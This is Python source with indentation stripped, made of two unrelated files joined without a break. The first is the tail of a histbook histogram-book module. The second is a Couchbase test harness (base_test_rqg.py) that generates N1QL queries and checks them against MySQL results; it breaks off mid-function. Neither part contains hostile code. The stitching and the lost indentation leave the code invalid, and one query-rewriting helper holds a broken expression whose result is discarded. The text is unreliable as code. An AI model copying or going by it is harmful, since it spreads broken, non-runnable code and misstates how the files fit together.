if arrays is None:
arrays = more
elif len(more) == 0:
pass
else:
arrays = histbook.util.ChainedDict(arrays, more)
for x in self.itervalues(recursive=True, onlyhist=True):
x._prefill()
length = self._fill(arrays)
for x in self.itervalues(recursive=True, onlyhist=True):
x._postfill(arrays, length)
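# Commented fill sketch (illustrative only, assuming Numpy is available and
# the axis expressions are plain field names): every histogram in the book is
# filled from the same input arrays in a single call.
#
#     import numpy as np
#     book = Book(pt=histbook.hist.Hist(histbook.axis.bin("pt", 50, 0.0, 250.0)),
#                 eta=histbook.hist.Hist(histbook.axis.bin("eta", 20, -2.5, 2.5)))
#     book.fill(pt=np.random.exponential(50.0, 10000),
#               eta=np.random.uniform(-2.5, 2.5, 10000))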
################################################################ for constructing fillable views
class ViewableBook(GenericBook):
def view(self, name):
if not isinstance(name, string):
raise TypeError("keys of a {0} must be strings".format(self.__class__.__name__))
def recurse(node, path):
if isinstance(node, histbook.hist.Hist):
if fnmatch.fnmatchcase(path, name):
return node
else:
return None
else:
content = collections.OrderedDict()
for n, x in node.iteritems():
deep = recurse(x, (n if path is None else path + "/" + n))
if deep is not None:
content[n] = deep
if len(content) != 0:
return ViewBook.fromdicts(content, node._attachment)
else:
return None
out = recurse(self, None)
if out is None:
raise ValueError("nothing matched path wildcard pattern {0}".format(repr(name)))
return out
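# Commented view sketch (illustrative only; 'book', the "muons/*" pattern and
# pt_array are hypothetical): ``view`` selects the subtree of histograms whose
# full paths match a glob pattern and returns them as a ViewBook that shares
# the underlying histogram objects, so filling the view fills the originals.
#
#     muons_only = book.view("muons/*")
#     muons_only.fill(pt=pt_array)   # fills only the histograms under "muons/"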
class ViewBook(Book):
def __str__(self, indent=",\n ", first=True):
return super(ViewBook, self).__str__(indent=indent, first=first)
################################################################ statistically relevant books
class ChannelsBook(ViewableBook):
pass
class SamplesBook(ViewableBook):
def __init__(self, samples, hists1={}, *hists2, **hists3):
self._content = collections.OrderedDict()
self._attachment = {}
for sample in samples:
self[sample] = Book(hists1, *hists2, **hists3).copyonfill()
self._changed()
class SystematicsBook(Book):
def __str__(self, indent=",\n ", first=True):
return super(SystematicsBook, self).__str__(indent=indent, first=first)
def _changed(self):
self.assertcompatible()
if not all(x.has("systematic") for x in self.itervalues(recursive=True, onlyhist=True)):
raise ValueError("all histograms in a SystematicsBook must have a 'systematic' attachment")
base_test_rqg.py
import paramiko
from basetestcase import BaseTestCase
import os
import zipfile
import Queue
import json
import threading
from memcached.helper.data_helper import VBucketAwareMemcached
from rqg_mysql_client import RQGMySQLClient
from membase.api.rest_client import RestConnection, Bucket
from couchbase_helper.tuq_helper import N1QLHelper
from rqg_query_helper import RQGQueryHelper
from remote.remote_util import RemoteMachineShellConnection
import random
from itertools import combinations
import shutil
from os import listdir
from os.path import isfile, join
import traceback
from rqg_postgres_client import RQGPostgresClient
from membase.api.exception import CBQError
class BaseRQGTests(BaseTestCase):
def setUp(self):
try:
super(BaseRQGTests, self).setUp()
self.log.info("============== RQG Setup Has Started ==============")
self.client_map = {}
self.check_covering_index = self.input.param("check_covering_index", True)
self.skip_setup_cleanup = True
self.crud_ops = self.input.param("crud_ops", False)
self.ansi_joins = self.input.param("ansi_joins", False)
self.with_let = self.input.param("with_let", False)
self.ansi_transform = self.input.param("ansi_transform", False)
self.prepared = self.input.param("prepared", False)
self.hash_joins = self.input.param("hash_joins", False)
self.create_secondary_meta_indexes = self.input.param("create_secondary_meta_indexes", False)
self.aggregate_pushdown = self.input.param("aggregate_pushdown", False)
self.create_secondary_ansi_join_indexes = self.input.param("create_secondary_ansi_join_indexes", False)
self.remove_alias = self.input.param("remove_alias", True)
self.skip_cleanup = self.input.param("skip_cleanup", False)
self.build_secondary_index_in_seq = self.input.param("build_secondary_index_in_seq", False)
self.number_of_buckets = self.input.param("number_of_buckets", 5)
self.crud_type = self.input.param("crud_type", "update")
self.populate_with_replay = self.input.param("populate_with_replay", False)
self.crud_batch_size = self.input.param("crud_batch_size", 1)
self.record_failure = self.input.param("record_failure", False)
self.failure_record_path = self.input.param("failure_record_path", "/tmp")
self.use_mysql = self.input.param("use_mysql", False)
self.use_postgres = self.input.param("use_postgres", False)
self.initial_loading_to_cb = self.input.param("initial_loading_to_cb", True)
self.change_bucket_properties = self.input.param("change_bucket_properties", False)
self.database = self.input.param("database", "flightstats")
self.merge_operation = self.input.param("merge_operation", False)
self.load_copy_table = self.input.param("load_copy_table", False)
self.user_id = self.input.param("user_id", "root")
self.user_cluster = self.input.param("user_cluster", "Administrator")
self.password = self.input.param("password", "")
self.password_cluster = self.input.param("password_cluster", "password")
self.generate_input_only = self.input.param("generate_input_only", False)
self.using_gsi = self.input.param("using_gsi", True)
self.reset_database = self.input.param("reset_database", True)
self.create_primary_index = self.input.param("create_primary_index", False)
self.create_secondary_indexes = self.input.param("create_secondary_indexes", False)
self.use_advisor = self.input.param("use_advisor", False)
self.items = self.input.param("items", 1000)
self.mysql_url = self.input.param("mysql_url", "localhost")
self.mysql_url = self.mysql_url.replace("_", ".")
self.gen_secondary_indexes = self.input.param("gen_secondary_indexes", False)
self.gen_gsi_indexes = self.input.param("gen_gsi_indexes", True)
self.n1ql_server = self.get_nodes_from_services_map(service_type="n1ql")
self.create_all_indexes = self.input.param("create_all_indexes", False)
self.concurreny_count = self.input.param("concurreny_count", 10)
self.total_queries = self.input.param("total_queries", None)
self.run_query_without_index_hint = self.input.param("run_query_without_index_hint", True)
self.run_query_with_primary = self.input.param("run_query_with_primary", False)
self.run_query_with_secondary = self.input.param("run_query_with_secondary", False)
self.run_explain_with_hints = self.input.param("run_explain_with_hints", False)
self.test_file_path = self.input.param("test_file_path", None)
self.secondary_index_info_path = self.input.param("secondary_index_info_path", None)
self.db_dump_path = self.input.param("db_dump_path", None)
self.input_rqg_path = self.input.param("input_rqg_path", None)
self.set_limit = self.input.param("set_limit", 0)
self.build_index_batch_size = self.input.param("build_index_batch_size", 1000)
self.query_count = 0
self.use_rest = self.input.param("use_rest", True)
self.ram_quota = self.input.param("ram_quota", 512)
self.drop_index = self.input.param("drop_index", False)
self.drop_bucket = self.input.param("drop_bucket", False)
self.dynamic_indexing = self.input.param("dynamic_indexing", False)
self.partitioned_indexes = self.input.param("partitioned_indexes", False)
self.pushdown = self.input.param("pushdown", False)
self.subquery = self.input.param("subquery", False)
self.drop_secondary_indexes = self.input.param("drop_secondary_indexes", True)
self.query_helper = self._initialize_rqg_query_helper()
self.n1ql_helper = self._initialize_n1ql_helper()
self.rest = RestConnection(self.master)
self.indexer_memQuota = self.input.param("indexer_memQuota", 1024)
self.teardown_mysql = self.use_mysql and self.reset_database and (not self.skip_cleanup)
self.keyword_list = self.query_helper._read_keywords_from_file("b/resources/rqg/n1ql_info/keywords.txt")
self.use_secondary_index = self.run_query_with_secondary or self.run_explain_with_hints
self.check_explain_plan = self.input.param("explain_plan", False)
self.index_limit = self.input.param("index_limit", 5)
self.advise_server = self.input.advisor
self.advise_buckets = ["bucket_01", "bucket_02", "bucket_03", "bucket_04", "bucket_05", "bucket_06", "bucket_07", "bucket_08", "bucket_09", "bucket_10"]
self.advise_dict={}
if self.input_rqg_path is not None:
self.secondary_index_info_path = self.input_rqg_path+"/index/secondary_index_definitions.txt"
self.db_dump_path = self.input_rqg_path+"/db_dump/database_dump.zip"
self.test_file_path = self.input_rqg_path+"/input/source_input_rqg_run.txt"
if self.initial_loading_to_cb:
self._initialize_cluster_setup()
if self.subquery:
self.items = 500
if not self.use_rest:
self._ssh_client = paramiko.SSHClient()
self._ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.os = self.shell.extract_remote_info().type.lower()
except Exception, ex:
self.log.info("============== RQG Setup Has Failed ==============")
traceback.print_exc()
self.tearDown()
self.assertTrue(False, "RQG setup failed: {0}".format(str(ex)))
self.log.info("============== RQG Setup Has Completed ==============")
def tearDown(self):
try:
self.log.info("============== RQG BasTestCase Teardown Has Started ==============")
super(BaseRQGTests, self).tearDown()
self.log.info("============== RQG BasTestCase Teardown Has Completed ==============")
self.log.info("============== RQG Teardown Has Started ==============")
if hasattr(self, 'reset_database'):
if self.teardown_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
self.kill_mysql_processes(client)
client.drop_database(self.database)
except Exception, ex:
self.log.info("============== RQG Teardown Has Failed ==============")
self.log.info(ex)
self.log.info("============== RQG Teardown Has Completed ==============")
def kill_mysql_processes(self, client):
columns, rows = client._execute_query(query="select concat('KILL ',id,';') from information_schema.processlist where user='root' and time > 0;")
sql_result = client._gen_json_from_results(columns, rows)
for result in sql_result:
for key in result.keys():
query = result[key]
# execute kill query
client._db_execute_query(query=query)
client.drop_database(self.database)
def test_rqg(self):
try:
# Get Data Map
table_list = self.client._get_table_list()
table_map = self.client._get_values_with_type_for_fields_in_table()
if self.remove_alias:
table_map = self.remove_aliases_from_table_map(table_map)
if self.crud_ops:
table_list.remove("copy_simple_table")
query_template_list = self.extract_query_templates()
# Generate the query batches based on the given template file and the concurrency count
batches = self.generate_batches(table_list, query_template_list)
result_queue = Queue.Queue()
failure_queue = Queue.Queue()
input_queue = Queue.Queue()
# Run Test Batches
thread_list = []
start_test_case_number = 1
if self.crud_ops:
for table_name in table_list:
if len(batches[table_name]) > 0:
self._crud_ops_worker(batches[table_name], table_name, table_map, result_queue, failure_queue)
#t = threading.Thread(target=self._crud_ops_worker, args=(
#batches[table_name], table_name, table_map, result_queue, failure_queue))
#t.daemon = True
#t.start()
#thread_list.append(t)
#for t in thread_list:
#t.join()
else:
while not batches.empty():
# Split up the batches and send them to the worker threads
try:
test_batch = batches.get(False)
except Exception, ex:
break
test_query_template_list = [test_data[test_data.keys()[0]] for test_data in test_batch]
input_queue.put({"start_test_case_number": start_test_case_number,
"query_template_list": test_query_template_list})
start_test_case_number += len(test_query_template_list)
for table_name in table_list:
# Create threads based on number of tables (each table has its own thread)
self._rqg_worker(table_name, table_map, input_queue, result_queue,
failure_queue)
#t = threading.Thread(target=self._rqg_worker,
# args=(table_name, table_map, input_queue, result_queue,
# failure_queue))
#t.daemon = True
#t.start()
#thread_list.append(t)
#for t in thread_list:
# if(t.is_alive()):
# t.join()
# Analyze the results for the failure and assert on the run
self.analyze_test(result_queue, failure_queue)
except Exception, ex:
traceback.print_exc()
self.log.info(ex)
self.assertFalse(True)
def _rqg_worker(self, table_name, table_map, input_queue, result_queue, failure_record_queue=None):
count = 0
table_name_description_map = {table_name: table_map[table_name]}
while True:
if self.total_queries <= self.query_count:
break
if not input_queue.empty():
data = input_queue.get()
start_test_case_number = data["start_test_case_number"]
query_template_list = data["query_template_list"]
# create strings for queries and indexes but doesn't send indexes to Couchbase
sql_n1ql_index_map_list = self.client._convert_template_query_info(table_map=table_name_description_map,
n1ql_queries=query_template_list,
define_gsi_index=self.use_secondary_index,
aggregate_pushdown=self.aggregate_pushdown,
partitioned_indexes=self.partitioned_indexes,
ansi_joins=self.ansi_joins,
with_let=self.with_let)
for sql_n1ql_index_map in sql_n1ql_index_map_list:
sql_n1ql_index_map["n1ql"] = sql_n1ql_index_map['n1ql'].replace("simple_table", self.database+"_"+"simple_table")
# build indexes
if self.use_secondary_index:
self._generate_secondary_indexes_in_batches(sql_n1ql_index_map_list)
thread_list = []
test_case_number = start_test_case_number
for test_case_input in sql_n1ql_index_map_list:
t = threading.Thread(target=self._run_basic_test, args=(test_case_input, test_case_number, result_queue, failure_record_queue))
#self._run_basic_test(test_case_input, test_case_number, result_queue, failure_record_queue)
test_case_number += 1
t.daemon = True
t.start()
thread_list.append(t)
# Drop all the secondary Indexes
for t in thread_list:
t.join()
if self.use_secondary_index and self.drop_secondary_indexes:
self._drop_secondary_indexes_in_batches(sql_n1ql_index_map_list)
else:
count += 1
if count > 1000:
return
def n1ql_query_runner_wrapper(self, n1ql_query="", server=None, query_params={}, scan_consistency=None, verbose=True):
if self.use_advisor:
self.create_secondary_index(n1ql_query=n1ql_query)
result = self.n1ql_helper.run_cbq_query(query=n1ql_query, server=server, query_params=query_params, scan_consistency=scan_consistency, verbose=verbose)
return result
def prepare_advise_query(self, n1ql_query=""):
for bucket in self.advise_dict.keys():
n1ql_query = n1ql_query.replace(bucket, self.advise_dict[bucket])
return n1ql_query
def translate_index_statement(self, n1ql_query=""):
for key in self.advise_dict.keys():
n1ql_query = n1ql_query.replace(self.advise_dict[key], key)
return n1ql_query
def create_secondary_index(self, n1ql_query=""):
if self.count_secondary_indexes() >= self.index_limit:
self.remove_all_secondary_indexes()
self.n1ql_helper.wait_for_all_indexes_online()
advise_query = self.prepare_advise_query(n1ql_query=n1ql_query)
advise_result = self.n1ql_helper.run_cbq_query(query="ADVISE " + advise_query,
server=self.advise_server)
if len(advise_result["results"][0]["advice"]["adviseinfo"]) == 0:
return
if "No index recommendation at this time" not in str(
str(advise_result["results"][0]["advice"]["adviseinfo"][0]["recommended_indexes"])):
if "indexes" in advise_result["results"][0]["advice"]["adviseinfo"][0][
"recommended_indexes"].keys():
for index_statement_array in advise_result["results"][0]["advice"]["adviseinfo"][0]["recommended_indexes"]["indexes"]:
index_statement = index_statement_array["index_statement"]
if index_statement != "":
self.n1ql_helper.wait_for_all_indexes_online()
try:
prepared_index_statement = self.translate_index_statement(index_statement)
self.n1ql_helper.run_cbq_query(prepared_index_statement)
self.n1ql_helper.wait_for_all_indexes_online()
except CBQError, ex:
if "already exists" in str(ex):
continue
if "covering_indexes" in advise_result["results"][0]["advice"]["adviseinfo"][0][
"recommended_indexes"].keys():
for index_statement_array in advise_result["results"][0]["advice"]["adviseinfo"][0]["recommended_indexes"]["covering_indexes"]:
index_statement = index_statement_array["index_statement"]
if index_statement != "":
self.n1ql_helper.wait_for_all_indexes_online()
try:
prepared_index_statement = self.translate_index_statement(index_statement)
self.n1ql_helper.run_cbq_query(prepared_index_statement)
self.n1ql_helper.wait_for_all_indexes_online()
except CBQError, ex:
if "already exists" in str(ex):
continue
def count_secondary_indexes(self):
count = self.n1ql_helper.run_cbq_query("select count(*) from system:indexes")
return int(count["results"][0]["$1"])
def remove_all_secondary_indexes(self):
self.n1ql_helper.drop_all_indexes()
def _run_basic_test(self, query_test_map, test_case_number, result_queue, failure_record_queue=None):
n1ql_query = query_test_map["n1ql"]
sql_query = query_test_map["sql"]
indexes = query_test_map["indexes"]
expected_result = query_test_map["expected_result"]
sql_query, n1ql_query = self.handle_limit_offset(sql_query, n1ql_query)
n1ql_query = self.handle_n1ql_table_name(n1ql_query)
sql_query, n1ql_query, aggregate = self.handle_subquery(sql_query, n1ql_query)
n1ql_query = self.handle_hash_join(n1ql_query)
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< BEGIN RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(
test_case_number))
# results dict
result_run = dict()
result_run["n1ql_query"] = n1ql_query
result_run["sql_query"] = sql_query
result_run["test_case_number"] = test_case_number
if self.ansi_transform:
result = self._run_explain_queries(n1ql_query=n1ql_query, keyword="u'outer':u'True'", present=False)
result_run.update(result)
if self.check_explain_plan:
result_run['check_explain_plan'] = self._check_explain_plan_for_secondary_index(n1ql_query=n1ql_query)
# run the query
result_run["run_query_without_index_hint"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query,
sql_query=sql_query,
expected_result=expected_result)
if expected_result is None:
expected_result = self._gen_expected_result(sql_query, test_case_number)
query_test_map["expected_result"] = expected_result
if self.set_limit > 0 and n1ql_query.find("DISTINCT") > 0:
result_limit = self.query_helper._add_limit_to_query(n1ql_query, self.set_limit)
result_run["run_query_with_limit"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=result_limit,
sql_query=sql_query,
expected_result=expected_result)
if self.run_query_with_primary:
index_info = [{"name": "`#primary`", "type": "GSI"}]
n1ql_query_with_hints = self.query_helper._add_index_hints_to_query(n1ql_query, index_info)
result_run["run_query_with_primary"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query_with_hints,
sql_query=sql_query,
expected_result=expected_result)
if self.aggregate_pushdown == "primary" and not self.with_let:
result_run["aggregate_explain_check::#primary"] = self._run_query_with_pushdown_check(n1ql_query,
index_info)
if self.run_query_with_secondary:
for index_name in indexes.keys():
n1ql_query_with_hints = self.query_helper._add_index_hints_to_query(n1ql_query, [indexes[index_name]])
result_run["run_query_with_index_name::{0}" + str(index_name)] = self._run_queries_and_verify(
aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query_with_hints,
sql_query=sql_query,
expected_result=expected_result)
if self.run_explain_with_hints:
result = self._run_queries_with_explain(n1ql_query, indexes)
result_run.update(result)
if self.aggregate_pushdown and not self.with_let:
for index_name in indexes.keys():
result_run["aggregate_explain_check::" + str(index_name)] = self._run_query_with_pushdown_check(
n1ql_query,
indexes[index_name])
if self.ansi_joins and self.hash_joins:
self._verify_query_with_hash_joins(n1ql_query)
result_queue.put(result_run)
self._check_and_push_failure_record_queue(result_run, query_test_map, failure_record_queue)
self.query_count += 1
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< END RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
def _crud_ops_worker(self, list_info, table_name, table_map, result_queue=None, failure_record_queue=None):
table_name_map = {table_name: table_map[table_name]}
for test_data in list_info:
test_case_number = test_data.keys()[0]
test_data = test_data[test_case_number]
data_info = self.convert_crud_ops_query(table_name, [test_data], table_name_map)
verification_query = "SELECT * from {0} where primary_key_id is not null ORDER by primary_key_id".format(table_name)
self._run_basic_crud_test(data_info[0], verification_query, test_case_number, result_queue, failure_record_queue, table_name=table_name)
self._populate_delta_buckets(table_name)
self.wait_for_num_items(table_name, 1000)
def remove_aliases_from_table_map(self, table_map):
for key in table_map.keys():
if "alias_name" in table_map[key].keys():
table_map[key].pop("alias_name")
return table_map
def extract_query_templates(self):
file_paths = self.test_file_path.split(":")
query_template_list = []
for file_path in file_paths:
file_path = self.unzip_template(file_path)
cur_queries_list = []
with open(file_path) as f:
cur_queries_list = f.readlines()
for q in cur_queries_list:
query_template_list.append(q)
if self.total_queries is None:
self.total_queries = len(query_template_list)
return query_template_list
def generate_batches(self, table_list, query_template_list):
if self.crud_ops:
batches = {}
for table_name in table_list:
batches[table_name] = []
else:
batches = Queue.Queue()
batch = []
count = 1
inserted_count = 0
test_case_number = 1
for template_query in query_template_list:
if self.crud_ops:
batches[table_list[test_case_number % (len(table_list))]].append({str(test_case_number): template_query})
else:
batch.append({str(test_case_number): template_query})
if count == self.concurreny_count:
inserted_count += len(batch)
batches.put(batch)
count = 1
batch = []
else:
count += 1
test_case_number += 1
if test_case_number > self.total_queries:
break
if not self.crud_ops:
if len(batch) > 0:
batches.put(batch)
return batches
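# Illustrative note (not executed): with self.concurreny_count == 2 and five
# query templates, the non-CRUD branch above yields a Queue of batches roughly
#     [{"1": q1}, {"2": q2}], [{"3": q3}, {"4": q4}], [{"5": q5}]
# while the CRUD branch round-robins the numbered templates across table names.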
def analyze_test(self, result_queue, failure_queue):
success, summary, result = self._test_result_analysis(result_queue)
self.log.info(result)
self.dump_failure_data(failure_queue)
self.assertTrue(success, summary)
def convert_crud_ops_query(self, table_name, data_info, table_name_map):
if self.crud_type == "update":
data_info = self.client_map[table_name]._convert_update_template_query_info(
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "delete":
data_info = self.client_map[table_name]._convert_delete_template_query_info(
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "merge_update":
data_info = self.client_map[table_name]._convert_update_template_query_info_with_merge(
source_table=self.database+"_"+"copy_simple_table",
target_table=table_name,
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "merge_delete":
data_info = self.client_map[table_name]._convert_delete_template_query_info_with_merge(
source_table=self.database+"_"+"copy_simple_table",
target_table=table_name,
table_map=table_name_map,
n1ql_queries=data_info)
return data_info
def wait_for_num_items(self, table, num_items):
num_items_reached = False
while not num_items_reached:
self.sleep(1)
query = "SELECT COUNT(*) from {0}".format(self.database+"_"+table)
result = self.n1ql_query_runner_wrapper(n1ql_query=query, server=self.n1ql_server)
if result["results"][0]["$1"] == num_items:
num_items_reached = True
def handle_limit_offset(self, sql_query, n1ql_query):
if "NUMERIC_VALUE1" in n1ql_query:
limit = random.randint(1, 30)
n1ql_query = n1ql_query.replace("NUMERIC_VALUE1", str(limit))
sql_query = sql_query.replace("NUMERIC_VALUE1", str(limit))
if limit < 10:
offset = limit - 2
else:
offset = limit - 10
if offset < 0:
offset = 0
n1ql_query = n1ql_query.replace("NUMERIC_VALUE2", str(offset))
sql_query = sql_query.replace("NUMERIC_VALUE2", str(offset))
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
return sql_query, n1ql_query
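# Illustrative note (not executed): a template such as
#     "... LIMIT NUMERIC_VALUE1 OFFSET NUMERIC_VALUE2"
# becomes, for a randomly drawn limit of 12,
#     "... LIMIT 12 OFFSET 2"
# with the same numbers substituted into both the SQL and the N1QL text.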
def handle_n1ql_table_name(self, n1ql_query):
if (n1ql_query.find("simple_table") > 0) and ((self.database+"_"+"simple_table") not in n1ql_query):
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
return n1ql_query
def handle_subquery(self, sql_query, n1ql_query):
aggregate = False
if self.subquery:
n1ql_query = n1ql_query.replace(self.database+"_"+"simple_table_2", "t_5.simple_table_2")
n1ql_query = n1ql_query.replace("t_5.t_5.simple_table_2", "t_5.simple_table_2")
if "qty" in n1ql_query:
n1ql_query = n1ql_query.replace("t_2.qty", "qty")
n1ql_query = n1ql_query.replace("qty", "t_2.qty")
if "sum" in n1ql_query:
n1ql_query = n1ql_query.replace("sum(t_1.productId)", "sum(t_1.qty)")
sql_query = sql_query.replace("sum(t_1.productId)", "sum(t_1.qty)")
n1ql_query = n1ql_query.replace("t_5.simple_table_2 t_1.price", "t_1.price")
sql_query = sql_query.replace("simple_table_2 t_1.price", "t_1.price")
n1ql_query = n1ql_query + " order by primary_key_id limit 5"
sql_query = sql_query + " order by t_5.primary_key_id limit 5"
if "sum" in n1ql_query or "min" in n1ql_query or "max" in n1ql_query or "count" in n1ql_query:
aggregate = True
return sql_query, n1ql_query, aggregate
def handle_hash_join(self, n1ql_query):
if self.ansi_joins and self.hash_joins:
hash_join_template_list = ["HASH(build)", "HASH(probe)"]
n1ql_query.replace(" ON ", "{0} ON ".random.choice(hash_join_template_list))
return n1ql_query
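# Illustrative note (not executed): with hash joins enabled, a join clause
# such as
#     "... JOIN t_2 ON t_1.id = t_2.id"
# is rewritten with a randomly chosen hint, e.g.
#     "... JOIN t_2 USE HASH(build) ON t_1.id = t_2.id"
# which _verify_query_with_hash_joins later checks against the EXPLAIN output.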
def _run_query_with_pushdown_check(self, n1ql_query, index):
message = "Pass"
explain_check = False
if isinstance(index, dict):
index = [index]
query = self.query_helper._add_index_hints_to_query(n1ql_query, index)
explain_n1ql = "EXPLAIN " + query
try:
actual_result = self.n1ql_helper.run_cbq_query(query=explain_n1ql, server=self.n1ql_server)
if "index_group_aggs" in str(actual_result):
explain_check = True
if not explain_check:
message = "aggregate query {0} with index {1} failed explain result, index_group_aggs not found".format(n1ql_query, index)
self.log.info(message)
self.log.info(str(actual_result))
except Exception, ex:
self.log.info(ex)
message = ex
explain_check = False
finally:
return {"success": explain_check, "result": message}
def _verify_query_with_hash_joins(self, n1ql_query):
message = "Pass"
explain_check = True
explain_n1ql = "EXPLAIN " + n1ql_query
hash_query_count = n1ql_query.count("HASH")
try:
actual_result = self.n1ql_helper.run_cbq_query(query=explain_n1ql, server=self.n1ql_server)
hash_explain_count = str(actual_result).count("HashJoin")
explain_check = (hash_query_count == hash_explain_count)
if not explain_check:
message = "Join query {0} with failed explain result, HashJoins not found".format(n1ql_query)
self.log.info(message)
self.log.info(str(actual_result))
except Exception, ex:
self.log.info(ex)
message = ex
explain_check = False
finally:
return {"success": explain_check, "result": message}
def _run_basic_crud_test(self, test_data, verification_query, test_case_number, result_queue, failure_record_queue=None, table_name=None):
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< BEGIN RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
result_run = {}
n1ql_query = test_data["n1ql_query"]
if n1ql_query.find("copy_simple_table") > 0:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
n1ql_query = n1ql_query.replace("copy_"+self.database+"_"+"simple_table", "copy_simple_table")
n1ql_query = n1ql_query.replace("ON KEY copy_simple_table", "ON KEY " + self.database+"_"+"copy_simple_table")
else:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
test_data["n1ql_query"] = n1ql_query
sql_query = test_data["sql_query"]
result_run["n1ql_query"] = n1ql_query
result_run["sql_query"] = sql_query
result_run["test_case_number"] = test_case_number
self.log.info("SQL :: {0}".format(sql_query))
self.log.info("N1QL :: {0}".format(n1ql_query))
crud_ops_run_result = None
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
try:
self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server)
client._insert_execute_query(query=sql_query)
except Exception, ex:
self.log.info(ex)
crud_ops_run_result = {"success": False, "result": str(ex)}
client._close_connection()
client._close_connection()
if crud_ops_run_result is None:
query_index_run = self._run_queries_and_verify_crud(n1ql_query=verification_query, sql_query=verification_query, expected_result=None, table_name=table_name)
else:
query_index_run = crud_ops_run_result
result_run["crud_verification_test"] = query_index_run
result_queue.put(result_run)
self._check_and_push_failure_record_queue(result_run, test_data, failure_record_queue)
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< END RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
def _test_result_analysis(self, queue):
result_list = []
pass_case = 0
fail_case = 0
failure_map = {}
keyword_map = {}
failure_reason_map = {}
success = True
while not queue.empty():
result_list.append(queue.get())
total = len(result_list)
for result_run in result_list:
test_case_number = result_run["test_case_number"]
sql_query = result_run["sql_query"]
n1ql_query = result_run["n1ql_query"]
check, message, failure_types = self._analyze_result(result_run)
success = success and check
if check:
pass_case += 1
else:
fail_case += 1
for failure_reason_type in failure_types:
if failure_reason_type not in failure_reason_map.keys():
failure_reason_map[failure_reason_type] = 1
else:
failure_reason_map[failure_reason_type] += 1
keyword_list = self.query_helper.find_matching_keywords(n1ql_query, self.keyword_list)
for keyword in keyword_list:
if keyword not in keyword_map.keys():
keyword_map[keyword] = 1
else:
keyword_map[keyword] += 1
failure_map[test_case_number] = {"sql_query": sql_query, "n1ql_query": n1ql_query,
"run_result": message, "keyword_list": keyword_list}
pass_percent = 0
if total > 0:
summary = " Total Queries Run = {0}, Pass = {1}, Fail = {2}, Pass Percentage = {3} %".format(total, pass_case, fail_case, ((pass_case*100)/total))
else:
summary = " No Query Results Found"
if len(keyword_map) > 0:
summary += "\n [ KEYWORD FAILURE DISTRIBUTION ] \n"
for keyword in keyword_map.keys():
summary += keyword+" :: " + str((keyword_map[keyword]*100)/total)+"%\n "
if len(failure_reason_map) > 0:
summary += "\n [ FAILURE TYPE DISTRIBUTION ] \n"
for keyword in failure_reason_map.keys():
summary += keyword+" :: " + str((failure_reason_map[keyword]*100)/total)+"%\n "
self.log.info(" Total Queries Run = {0}, Pass = {1}, Fail = {2}, Pass Percentage = {3} %".format(total, pass_case, fail_case, ((pass_case*100)/total)))
result = self._generate_result(failure_map)
return success, summary, result
def _gen_expected_result(self, sql="", test=49):
sql_result = []
try:
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
if test == 51:
columns = []
rows = []
else:
columns, rows = client._execute_query(query=sql)
if self.aggregate_pushdown:
sql_result = client._gen_json_from_results_repeated_columns(columns, rows)
else:
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
if ex.message.__contains__("SQL syntax") or ex.message.__contains__("ERROR"):
print "Error in sql syntax"
return sql_result
def _check_explain_plan_for_secondary_index(self, n1ql_query=None):
self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server)
actual_result = self.n1ql_helper.run_cbq_query(query="EXPLAIN "+n1ql_query, server=self.n1ql_server)
self.log.info("EXPLAIN PLAN :: "+str(actual_result))
if "PrimaryScan" in str(actual_result['results'][0]['plan']):
return {"success": False, "result": "Fail"}
else:
return {"success": True, "result": "Pass"}
def _run_queries_and_verify(self, aggregate=False, subquery=False, n1ql_query=None, sql_query=None, expected_result=None):
if not self.create_primary_index:
n1ql_query = n1ql_query.replace("USE INDEX(`#primary` USING GSI)", " ")
if self.prepared:
n1ql_query = "PREPARE " + n1ql_query
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
# Run n1ql query
hints = self.query_helper._find_hints(sql_query)
for i, item in enumerate(hints):
if "simple_table" in item:
hints[i] = hints[i].replace("simple_table", self.database+"_"+"simple_table")
try:
if subquery:
query_params = {'timeout': '1200s'}
else:
query_params={}
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus")
if self.prepared:
name = actual_result["results"][0]['name']
prepared_query = "EXECUTE '%s'" % name
self.log.info(" N1QL QUERY :: {0}".format(prepared_query))
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=prepared_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus")
n1ql_result = actual_result["results"]
